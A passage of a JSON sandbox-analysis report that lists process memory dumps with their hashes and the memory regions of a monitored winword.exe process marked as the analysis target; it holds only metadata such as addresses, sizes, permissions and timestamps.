"10ec1779ff66821e48dade7e1c7e78d1", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "23f6dad37dedc17be99ca2683202ef175ebbd293", "sha256_hash": "b7c5667cc3c0d74093fffe3d1eb519f26161e7014155cd7528359cb558ebe592", "size": 589824, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001739-addr_0x0000000001ff0000-size_0x0000000000001000-perm_rw.bin", "filename": "process_00000010-region_00001739-addr_0x0000000001ff0000-size_0x0000000000001000-perm_rw.bin", "id": "proc_dump_322", "md5_hash": "3c043fa9e476a05d39cd1ee2fad77da5", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "a2fe352a26d22809c36bb7eea49494c9efc44503", "sha256_hash": "86a4c42c7f39b8f26b0222e5cf7e7ab4d7bb172607ec359d85c3cef2c75e22a4", "size": 4096, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001743-addr_0x000007ff00170000-size_0x0000000000010000-perm_.bin", "filename": "process_00000010-region_00001743-addr_0x000007ff00170000-size_0x0000000000010000-perm_.bin", "id": "proc_dump_324", "md5_hash": "1bfed3c7a77219ee6aada6ae4ab20530", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "3ec649d601cb9c69d61b2074ceafbd7aebc989e1", "sha256_hash": "cae5e41050c4800d764fe0962e2e4bf04edd203bae075dca331c123f0a59be94", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001799-addr_0x000000001b800000-size_0x0000000000100000-perm_rw.bin", "filename": "process_00000010-region_00001799-addr_0x000000001b800000-size_0x0000000000100000-perm_rw.bin", "id": "proc_dump_331", "md5_hash": "26ddd04f5a232b810313408af89aa874", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "a08392466b76c2d0dcb3d9e839f05aa8499856d3", "sha256_hash": "5d3415b6e66b16a681b63ad30e2401119e27a3825240ec7e232c2243f08899f7", "size": 1048576, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001855-addr_0x000007ff00180000-size_0x0000000000010000-perm_.bin", "filename": "process_00000010-region_00001855-addr_0x000007ff00180000-size_0x0000000000010000-perm_.bin", "id": "proc_dump_333", "md5_hash": "4c40d726de5c4a1e5c19b8f61dcdf905", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "d557b45d2b0f14ed87830892d04135165fa241a7", "sha256_hash": "57b514a1bef325376ddedd70b64a239135890e33193b4a482711a7256e7d3278", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001856-addr_0x000007ff00190000-size_0x0000000000010000-perm_.bin", "filename": "process_00000010-region_00001856-addr_0x000007ff00190000-size_0x0000000000010000-perm_.bin", "id": "proc_dump_334", "md5_hash": "4c40d726de5c4a1e5c19b8f61dcdf905", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "d557b45d2b0f14ed87830892d04135165fa241a7", "sha256_hash": "57b514a1bef325376ddedd70b64a239135890e33193b4a482711a7256e7d3278", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001857-addr_0x000007ff001a0000-size_0x0000000000010000-perm_.bin", "filename": "process_00000010-region_00001857-addr_0x000007ff001a0000-size_0x0000000000010000-perm_.bin", "id": "proc_dump_335", "md5_hash": "4c40d726de5c4a1e5c19b8f61dcdf905", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "d557b45d2b0f14ed87830892d04135165fa241a7", "sha256_hash": "57b514a1bef325376ddedd70b64a239135890e33193b4a482711a7256e7d3278", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001858-addr_0x000007ff001b0000-size_0x0000000000010000-perm_.bin", "filename": "process_00000010-region_00001858-addr_0x000007ff001b0000-size_0x0000000000010000-perm_.bin", "id": "proc_dump_336", "md5_hash": "4c40d726de5c4a1e5c19b8f61dcdf905", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "d557b45d2b0f14ed87830892d04135165fa241a7", "sha256_hash": "57b514a1bef325376ddedd70b64a239135890e33193b4a482711a7256e7d3278", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001859-addr_0x000007ff001c0000-size_0x0000000000010000-perm_.bin", "filename": "process_00000010-region_00001859-addr_0x000007ff001c0000-size_0x0000000000010000-perm_.bin", "id": "proc_dump_337", "md5_hash": "4c40d726de5c4a1e5c19b8f61dcdf905", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "d557b45d2b0f14ed87830892d04135165fa241a7", "sha256_hash": "57b514a1bef325376ddedd70b64a239135890e33193b4a482711a7256e7d3278", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001860-addr_0x000007ff001d0000-size_0x0000000000010000-perm_.bin", "filename": "process_00000010-region_00001860-addr_0x000007ff001d0000-size_0x0000000000010000-perm_.bin", "id": "proc_dump_338", "md5_hash": "4c40d726de5c4a1e5c19b8f61dcdf905", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "d557b45d2b0f14ed87830892d04135165fa241a7", "sha256_hash": "57b514a1bef325376ddedd70b64a239135890e33193b4a482711a7256e7d3278", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001861-addr_0x000007ff001e0000-size_0x0000000000010000-perm_.bin", "filename": "process_00000010-region_00001861-addr_0x000007ff001e0000-size_0x0000000000010000-perm_.bin", "id": "proc_dump_339", "md5_hash": "4c40d726de5c4a1e5c19b8f61dcdf905", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "d557b45d2b0f14ed87830892d04135165fa241a7", "sha256_hash": "57b514a1bef325376ddedd70b64a239135890e33193b4a482711a7256e7d3278", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001894-addr_0x000007ff001f0000-size_0x0000000000010000-perm_.bin", "filename": "process_00000010-region_00001894-addr_0x000007ff001f0000-size_0x0000000000010000-perm_.bin", "id": "proc_dump_340", "md5_hash": "4c40d726de5c4a1e5c19b8f61dcdf905", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "d557b45d2b0f14ed87830892d04135165fa241a7", "sha256_hash": "57b514a1bef325376ddedd70b64a239135890e33193b4a482711a7256e7d3278", "size": 65536, "type": "process_dump", "version": 1 }, { "archive_path": "process_dumps/process_00000010-region_00001895-addr_0x000007ff00200000-size_0x0000000000010000-perm_.bin", "filename": "process_00000010-region_00001895-addr_0x000007ff00200000-size_0x0000000000010000-perm_.bin", "id": "proc_dump_341", "md5_hash": "4c40d726de5c4a1e5c19b8f61dcdf905", "ref_process": { "ref_id": "proc_10", "ref_source": "summary", "ref_type": "process", "type": "reference", "version": 1 }, "sha1_hash": "d557b45d2b0f14ed87830892d04135165fa241a7", "sha256_hash": "57b514a1bef325376ddedd70b64a239135890e33193b4a482711a7256e7d3278", "size": 65536, "type": "process_dump", "version": 1 } ], "processes": [ { "cmd_line": "\"C:\\Program Files\\Microsoft Office\\Root\\Office16\\WINWORD.EXE\"", "filename": "c:\\program files\\microsoft office\\root\\office16\\winword.exe", "id": "proc_1", "image_name": "winword.exe", "monitor_reason": "analysis_target", "monitored_id": 1, "origin_monitor_id": 0, "ref_parent_process": null, "regions": [ { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_134", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_135", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_136", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 278527, "entry_point": 0, "filename": null, "id": "region_137", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 1376255, "entry_point": 0, "filename": null, "id": "region_138", "name": "private_0x0000000000050000", "norm_filename": null, "region_type": "private_memory", "start_va": 327680, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 1376256, "type": "region", "version": 1 }, "end_va": 1380351, "entry_point": 0, "filename": null, "id": "region_139", "name": "pagefile_0x0000000000150000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1376256, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1445887, "entry_point": 0, "filename": null, "id": "region_140", "name": "private_0x0000000000160000", "norm_filename": null, "region_type": "private_memory", "start_va": 1441792, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1511423, "entry_point": 0, "filename": null, "id": "region_141", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1572864, "type": "region", "version": 1 }, "end_va": 1576959, "entry_point": 0, "filename": null, "id": "region_142", "name": "pagefile_0x0000000000180000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1572864, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 2686975, "entry_point": 0, "filename": null, "id": "region_143", "name": "private_0x0000000000190000", "norm_filename": null, "region_type": "private_memory", "start_va": 1638400, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 3108863, "entry_point": 2686976, "filename": "\\Windows\\System32\\locale.nls", "id": "region_144", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 2686976, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 3174399, "entry_point": 0, "filename": null, "id": "region_145", "name": "pagefile_0x0000000000300000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3145728, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 3211264, "type": "region", "version": 1 }, "end_va": 3219455, "entry_point": 0, "filename": null, "id": "region_146", "name": "pagefile_0x0000000000310000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3211264, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 3276800, "type": "region", "version": 1 }, "end_va": 3280895, "entry_point": 0, "filename": null, "id": "region_147", "name": "private_0x0000000000320000", "norm_filename": null, "region_type": "private_memory", "start_va": 3276800, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 3342336, "type": "region", "version": 1 }, "end_va": 3346431, "entry_point": 0, "filename": null, "id": "region_148", "name": "private_0x0000000000330000", "norm_filename": null, "region_type": "private_memory", "start_va": 3342336, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 3407872, "type": "region", "version": 1 }, "end_va": 3416063, "entry_point": 0, "filename": null, "id": "region_149", "name": "pagefile_0x0000000000340000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3407872, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 3473408, "type": "region", "version": 1 }, "end_va": 3481599, "entry_point": 0, "filename": null, "id": "region_150", "name": "pagefile_0x0000000000350000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3473408, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 3538944, "type": "region", "version": 1 }, "end_va": 3551231, "entry_point": 0, "filename": null, "id": "region_151", "name": "pagefile_0x0000000000360000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3538944, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "" ], "ref_process_dump": null, "size": 65536, "start_va": 3604480, "type": "region", "version": 1 }, "end_va": 3670015, "entry_point": 0, "filename": null, "id": "region_152", "name": "private_0x0000000000370000", "norm_filename": null, "region_type": "private_memory", "start_va": 3604480, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 3670016, "type": "region", "version": 1 }, "end_va": 3735551, "entry_point": 0, "filename": null, "id": "region_153", "name": "private_0x0000000000380000", "norm_filename": null, "region_type": "private_memory", "start_va": 3670016, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 3735552, "type": "region", "version": 1 }, "end_va": 4784127, "entry_point": 0, "filename": null, "id": "region_154", "name": "private_0x0000000000390000", "norm_filename": null, "region_type": "private_memory", "start_va": 3735552, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 4784128, "type": "region", "version": 1 }, "end_va": 6389759, "entry_point": 0, "filename": null, "id": "region_155", "name": "pagefile_0x0000000000490000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4784128, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 6422528, "type": "region", "version": 1 }, "end_va": 7999487, "entry_point": 0, "filename": null, "id": "region_156", "name": "pagefile_0x0000000000620000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6422528, "timestamp": "00:00:32.359", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 8060928, "type": "region", "version": 1 }, "end_va": 29032447, "entry_point": 0, "filename": null, "id": "region_157", "name": "pagefile_0x00000000007b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8060928, "timestamp": "00:00:32.360", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 29032448, "type": "region", "version": 1 }, "end_va": 31977471, "entry_point": 29032448, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_158", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 29032448, "timestamp": "00:00:32.360", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 31981568, "type": "region", "version": 1 }, "end_va": 36122623, "entry_point": 0, "filename": null, "id": "region_159", "name": "pagefile_0x0000000001e80000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 31981568, "timestamp": "00:00:32.360", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 36175872, "type": "region", "version": 1 }, "end_va": 37224447, "entry_point": 0, "filename": null, "id": "region_160", "name": "private_0x0000000002280000", "norm_filename": null, "region_type": "private_memory", "start_va": 36175872, "timestamp": "00:00:32.360", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 37224448, "type": "region", "version": 1 }, "end_va": 37236735, "entry_point": 0, "filename": null, "id": "region_161", "name": "pagefile_0x0000000002380000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 37224448, "timestamp": "00:00:32.360", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 37289984, "type": "region", "version": 1 }, "end_va": 37302271, "entry_point": 0, "filename": null, "id": "region_162", "name": "pagefile_0x0000000002390000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 37289984, "timestamp": "00:00:32.360", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 37355520, "type": "region", "version": 1 }, "end_va": 37367807, "entry_point": 0, "filename": null, "id": "region_163", "name": "pagefile_0x00000000023a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 37355520, "timestamp": "00:00:32.360", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 12288, "start_va": 37421056, "type": "region", "version": 1 }, "end_va": 37433343, "entry_point": 0, "filename": null, "id": "region_164", "name": "pagefile_0x00000000023b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 37421056, "timestamp": "00:00:32.360", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 37486592, "type": "region", "version": 1 }, "end_va": 37748735, "entry_point": 0, "filename": null, "id": "region_165", "name": "private_0x00000000023c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 37486592, "timestamp": "00:00:32.360", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 32768, "start_va": 37748736, "type": "region", "version": 1 }, "end_va": 37781503, "entry_point": 0, "filename": null, "id": "region_166", "name": "private_0x0000000002400000", "norm_filename": null, "region_type": "private_memory", "start_va": 37748736, "timestamp": "00:00:32.360", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 37814272, "type": "region", "version": 1 }, "end_va": 37822463, "entry_point": 0, "filename": null, "id": "region_167", "name": "pagefile_0x0000000002410000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 37814272, "timestamp": "00:00:32.360", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 786432, "start_va": 37879808, "type": "region", "version": 1 }, "end_va": 38666239, "entry_point": 37879808, "filename": "\\Windows\\System32\\en-US\\KernelBase.dll.mui", "id": "region_168", "name": "kernelbase.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\kernelbase.dll.mui", "region_type": "memory_mapped_file", "start_va": 37879808, "timestamp": "00:00:32.360", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 38666240, "type": "region", "version": 1 }, "end_va": 38670335, "entry_point": 0, "filename": null, "id": "region_169", "name": "private_0x00000000024e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38666240, "timestamp": "00:00:32.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 38731776, "type": "region", "version": 1 }, "end_va": 39256063, "entry_point": 0, "filename": null, "id": "region_170", "name": "private_0x00000000024f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 38731776, "timestamp": "00:00:32.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 39256064, "type": "region", "version": 1 }, "end_va": 39260159, "entry_point": 0, "filename": null, "id": "region_171", "name": "private_0x0000000002570000", "norm_filename": null, "region_type": "private_memory", "start_va": 39256064, "timestamp": "00:00:32.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 39321600, "type": "region", "version": 1 }, "end_va": 39325695, "entry_point": 0, "filename": null, "id": "region_172", "name": "private_0x0000000002580000", "norm_filename": null, "region_type": "private_memory", "start_va": 39321600, "timestamp": "00:00:32.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 39387136, "type": "region", "version": 1 }, "end_va": 39391231, "entry_point": 0, "filename": null, "id": "region_173", "name": "private_0x0000000002590000", "norm_filename": null, "region_type": "private_memory", "start_va": 39387136, "timestamp": "00:00:32.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 39452672, "type": "region", "version": 1 }, "end_va": 39456767, "entry_point": 0, "filename": null, "id": "region_174", "name": "private_0x00000000025a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 39452672, "timestamp": "00:00:32.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 39518208, "type": "region", "version": 1 }, "end_va": 39583743, "entry_point": 0, "filename": null, "id": "region_175", "name": "private_0x00000000025b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 39518208, "timestamp": "00:00:32.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 39583744, "type": "region", "version": 1 }, "end_va": 40497151, "entry_point": 0, "filename": null, "id": "region_176", "name": "pagefile_0x00000000025c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 39583744, "timestamp": "00:00:32.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 163840, "start_va": 40501248, "type": "region", "version": 1 }, "end_va": 40665087, "entry_point": 0, "filename": null, "id": "region_177", "name": "private_0x00000000026a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 40501248, "timestamp": "00:00:32.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 438272, "start_va": 40697856, "type": "region", "version": 1 }, "end_va": 41136127, "entry_point": 0, "filename": null, "id": "region_178", "name": "private_0x00000000026d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 40697856, "timestamp": "00:00:32.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 20480, "start_va": 41156608, "type": "region", "version": 1 }, "end_va": 41177087, "entry_point": 0, "filename": null, "id": "region_179", "name": "pagefile_0x0000000002740000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 41156608, "timestamp": "00:00:32.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 41222144, "type": "region", "version": 1 }, "end_va": 41226239, "entry_point": 0, "filename": null, "id": "region_180", "name": "pagefile_0x0000000002750000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 41222144, "timestamp": "00:00:32.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 41287680, "type": "region", "version": 1 }, "end_va": 41291775, "entry_point": 0, "filename": null, "id": "region_181", "name": "pagefile_0x0000000002760000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 41287680, "timestamp": "00:00:32.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 41353216, "type": "region", "version": 1 }, "end_va": 41357311, "entry_point": 0, "filename": null, "id": "region_182", "name": "private_0x0000000002770000", "norm_filename": null, "region_type": "private_memory", "start_va": 41353216, "timestamp": "00:00:32.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 41418752, "type": "region", "version": 1 }, "end_va": 41426943, "entry_point": 0, "filename": null, "id": "region_183", "name": "pagefile_0x0000000002780000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 41418752, "timestamp": "00:00:32.367", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 41484288, "type": "region", "version": 1 }, "end_va": 41549823, "entry_point": 0, "filename": null, "id": 